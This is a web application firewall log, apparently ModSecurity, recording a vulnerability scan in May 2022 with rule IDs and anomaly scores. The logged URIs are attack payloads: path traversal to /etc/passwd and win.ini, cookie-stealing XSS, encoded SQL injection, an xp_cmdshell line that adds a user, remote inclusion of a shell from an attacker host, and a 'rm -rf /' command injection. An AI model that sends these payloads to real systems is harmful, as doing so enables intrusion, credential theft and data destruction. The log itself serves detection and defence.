TimeStamp [17/May/2022:19:50:56 +0200]	Uri [/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28%2A.mdb%29&dsn=Evil%2Bsamples%2Bfrom%2Bmicrosoft&dbq=..%2F..%2Fwwwroot%2Fevil.html&newdb=CREATE_DB]	PLmin [1]	Score [30]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:50:57 +0200]	Uri [/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c%2Bdir]	PLmin [1]	Score [10]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:50:57 +0200]	Uri [/cgi-bin/store.cgi?StartID=../etc/%00.html]	PLmin [1]	Score [20]	Nattacks [3]	[920270]	[930110]	[949110]
TimeStamp [17/May/2022:19:50:58 +0200]	Uri [/NessusTest41.html]	PLmin [1]	Score [5]	Nattacks [2]	[913120]	[949110]
TimeStamp [17/May/2022:19:50:58 +0200]	Uri [/nuke71/modules.php?name=Downloads&d_op=TopRated&ratenum=%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&ratetype=x]	PLmin [1]	Score [20]	Nattacks [5]	[941100]	[941110]	[941160]	[941180]	[949110]
TimeStamp [17/May/2022:19:50:59 +0200]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20un%69%6f%6e%20sel%65ct%20or%64%28su%62s%74%72ing%28u%73er%5fpa%73s%77or%64%2c%31%36]	PLmin [1]	Score [10]	Nattacks [3]	[942190]	[942360]	[949110]
TimeStamp [17/May/2022:19:51:00 +0200]	Uri [/cgi-bin/view-source?../../../../../../../etc/passwd]	PLmin [1]	Score [20]	Nattacks [5]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [17/May/2022:19:51:01 +0200]	Uri [/.%22./.%22./winnt/win.ini%20.pl]	PLmin [1]	Score [5]	Nattacks [2]	[930110]	[949110]
TimeStamp [17/May/2022:19:51:02 +0200]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75ni%6f%6e%20sel%65%63%74%20o%72%64%28s%75bst%72in%67%28%75s%65r%5fp%61ss%77%6f%72%64]	PLmin [1]	Score [10]	Nattacks [3]	[942190]	[942360]	[949110]
TimeStamp [17/May/2022:19:51:03 +0200]	Uri [/defines.php?WEBCHATPATH=http://192.168.137.211/db_mysql.php]	PLmin [1]	Score [5]	Nattacks [2]	[931100]	[949110]
TimeStamp [17/May/2022:19:51:03 +0200]	Uri [/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr%27%3Bexec%20master..xp_cmdshell%27net%20user%20algo%20hacker%20/add%27%3B--]	PLmin [1]	Score [10]	Nattacks [3]	[932100]	[942190]	[949110]
TimeStamp [17/May/2022:19:51:04 +0200]	Uri [/scripts/iisadmin/ism.dll?http/dir]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [17/May/2022:19:51:05 +0200]	Uri [/forum/index.php?act=Search&nav=lv&CODE=show&searchid=&search_in=topics&result_type=topics&hl=&st=20%27%3B%20EXECUTE%20IMMEDIATE%20%27SEL%27%20%7C%7C%20%27ECT%20US%27%20%7C%7C%20%27ER%27/%2A]	PLmin [1]	Score [5]	Nattacks [2]	[942250]	[949110]
TimeStamp [17/May/2022:19:51:06 +0200]	Uri [/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts]	PLmin [1]	Score [30]	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
TimeStamp [17/May/2022:19:51:06 +0200]	Uri [/cgi-bin/bbs_forum.cgi?forum=%3Cforum_name%3E&read=../../../../../../etc/passwd]	PLmin [1]	Score [30]	Nattacks [5]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [17/May/2022:19:51:08 +0200]	Uri [/scripts/browse.php?value=%20_&dynamic_value=..%5C..%5Cboot.ini%250]	PLmin [1]	Score [28]	Nattacks [5]	[920220]	[930100]	[930110]	[930120]	[949110]
TimeStamp [17/May/2022:19:51:09 +0200]	Uri [/carbo.dll?icatcommand=..%5C..%5Cwinnt%5Cntbtlog.txt&catalogname=catalog]	PLmin [1]	Score [25]	Nattacks [4]	[920440]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:51:10 +0200]	Uri [/support/common.php?f=0&ForumLang=../../../../../../../etc/resolv.conf]	PLmin [1]	Score [30]	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
TimeStamp [17/May/2022:19:51:10 +0200]	Uri [/cgi-bin/bbs_forum.cgi?forum=%3Cforum_name%3E&read=../../../../../../etc/hosts]	PLmin [1]	Score [25]	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
TimeStamp [17/May/2022:19:51:11 +0200]	Uri [/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [17/May/2022:19:51:12 +0200]	Uri [/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	PLmin [1]	Score [30]	Nattacks [4]	[920440]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:51:13 +0200]	Uri [/scripts/iisadmin/bdir.htr??d:%5Cwebs]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [17/May/2022:19:51:13 +0200]	Uri [/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/hosts]	PLmin [1]	Score [15]	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
TimeStamp [17/May/2022:19:51:14 +0200]	Uri [/cgi-bin/perlshop.cgi%0D]	PLmin [1]	Score [5]	Nattacks [2]	[921190]	[949110]
TimeStamp [17/May/2022:19:51:15 +0200]	Uri [/cgi-bin/story.pl?next=../../../etc/passwd%00]	PLmin [1]	Score [50]	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [17/May/2022:19:51:16 +0200]	Uri [/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	PLmin [1]	Score [10]	Nattacks [3]	[933130]	[933160]	[949110]
TimeStamp [17/May/2022:19:51:17 +0200]	Uri [/cgi-bin/apexec.pl?template=/etc/passwd%25%0000.html]	PLmin [1]	Score [23]	Nattacks [5]	[920220]	[920270]	[930120]	[932160]	[949110]
TimeStamp [17/May/2022:19:51:18 +0200]	Uri [/cgi-bin/faxsurvey?/bin/cat%20/etc/resolv.conf]	PLmin [1]	Score [10]	Nattacks [3]	[930120]	[932160]	[949110]
TimeStamp [17/May/2022:19:51:18 +0200]	Uri [/cgi-bin/echo.bat?&dir%2Bc:%5C]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [17/May/2022:19:51:19 +0200]	Uri [/cgi-bin/pagelog.cgi?name=../../../../../tmp/archivo.log]	PLmin [1]	Score [20]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:51:19 +0200]	Uri [/cgi-bin/search.cgi?letter=..%5C..%5C..%5C..%5Calgo&start=1&perpage=all]	PLmin [1]	Score [20]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:51:20 +0200]	Uri [/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts]	PLmin [1]	Score [25]	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
TimeStamp [17/May/2022:19:51:21 +0200]	Uri [/cgi-bin/pagelog.cgi?name=../../../../../tmp/archivo.txt]	PLmin [1]	Score [20]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:51:22 +0200]	Uri [/filename%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [17/May/2022:19:51:22 +0200]	Uri [/PHPLibrary-1.5.3/example/lib/stphpbtnimage.php?cfg_dir=http://www.atacante.com/shell.txt?&]	PLmin [1]	Score [5]	Nattacks [2]	[931120]	[949110]
TimeStamp [17/May/2022:19:51:23 +0200]	Uri [/msadc/Samples/SELECTOR/CodeBrws.asp?source=/../../winnt/Profiles/Administrator/Application%20Data/Microsoft/Outlook%20Express/Mail/inbox.mb]	PLmin [1]	Score [30]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:51:24 +0200]	Uri [/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html]	PLmin [1]	Score [50]	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [17/May/2022:19:51:25 +0200]	Uri [/fcgi-bin/echo2.exe?foo=%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E]	PLmin [1]	Score [15]	Nattacks [4]	[941100]	[941110]	[941160]	[949110]
TimeStamp [17/May/2022:19:51:26 +0200]	Uri [/scripts/georgi.asp/..%C1%9C..%C1%9C..%C1%9Carchivo.ext]	PLmin [1]	Score [10]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:51:27 +0200]	Uri [/cgi-bin/csSearch.cgi?command=savesetup&setup=%60rm%20-rf%20/%60]	PLmin [1]	Score [10]	Nattacks [3]	[932105]	[932115]	[949110]
TimeStamp [17/May/2022:19:51:28 +0200]	Uri [/cgi-bin/GW5/GWWEB.EXE?HELP=../../../]	PLmin [1]	Score [25]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:51:28 +0200]	Uri [/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00]	PLmin [1]	Score [45]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[949110]
TimeStamp [17/May/2022:19:51:29 +0200]	Uri [/cgi-bin/search/search.cgi?keys=%2A&prc=any&catigory=../../../../../..]	PLmin [1]	Score [20]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:51:30 +0200]	Uri [/cgi-bin/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd]	PLmin [1]	Score [30]	Nattacks [5]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [17/May/2022:19:51:31 +0200]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75ni%6f%6e%20se%6c%65%63%74%20o%72d%28%73u%62%73%74r%69n%67%28%75%73e%72_pa%73%73%77%6f%72%64]	PLmin [1]	Score [10]	Nattacks [3]	[942190]	[942360]	[949110]
TimeStamp [17/May/2022:19:51:32 +0200]	Uri [/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/hosts.allow]	PLmin [1]	Score [25]	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
TimeStamp [17/May/2022:19:51:33 +0200]	Uri [/it/services/help/?show=about&module=%3B%22.passthru%28%22hola%22%29%3B%27]	PLmin [1]	Score [5]	Nattacks [2]	[933160]	[949110]
TimeStamp [17/May/2022:19:51:33 +0200]	Uri [/carbo.dll?icatcommand=file_to_view&catalogname=catalog%0D]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [17/May/2022:19:51:34 +0200]	Uri [/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1]	PLmin [1]	Score [50]	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [17/May/2022:19:51:35 +0200]	Uri [/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/hosts]	PLmin [1]	Score [15]	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
TimeStamp [17/May/2022:19:51:36 +0200]	Uri [/path/modules.php?op=modload&name=Wiki&file=index&pagename=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E]	PLmin [1]	Score [20]	Nattacks [5]	[941100]	[941110]	[941160]	[941180]	[949110]
TimeStamp [17/May/2022:19:51:38 +0200]	Uri [/iisadmpwd/aexp2b.htr]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [17/May/2022:19:51:38 +0200]	Uri [/typo3/typo3/dev/translations.php?ONLY=/etc/httpd/logs/error_log%00%27]	PLmin [1]	Score [15]	Nattacks [3]	[920270]	[930120]	[949110]
TimeStamp [17/May/2022:19:51:39 +0200]	Uri [/it/?cmd=%00%04%24%00%10%00%00%04%24%00%10%00%00%04%24%00%00%00%00%5D%21%00%00%00%02%00%00%00%10D%00W%11%00%00%00d5%00%00%00%00d%25%00%00%00%00%00f?MZt%08%00%10%00%00W%3C%01f:PEuZx%01s%0C%01%3Ekernt%08%3EKERNu%7E%04el32t%09%7E%04EL32ud%05%00%00%00%00%04%0E%04%00%00%02%00%00%03%00%00%1E%04%00%00s%02%00%00%03%00%00]	PLmin [1]	Score [13]	Nattacks [3]	[920220]	[920270]	[949110]
TimeStamp [17/May/2022:19:51:40 +0200]	Uri [/scripts/database/philboard.mdb]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
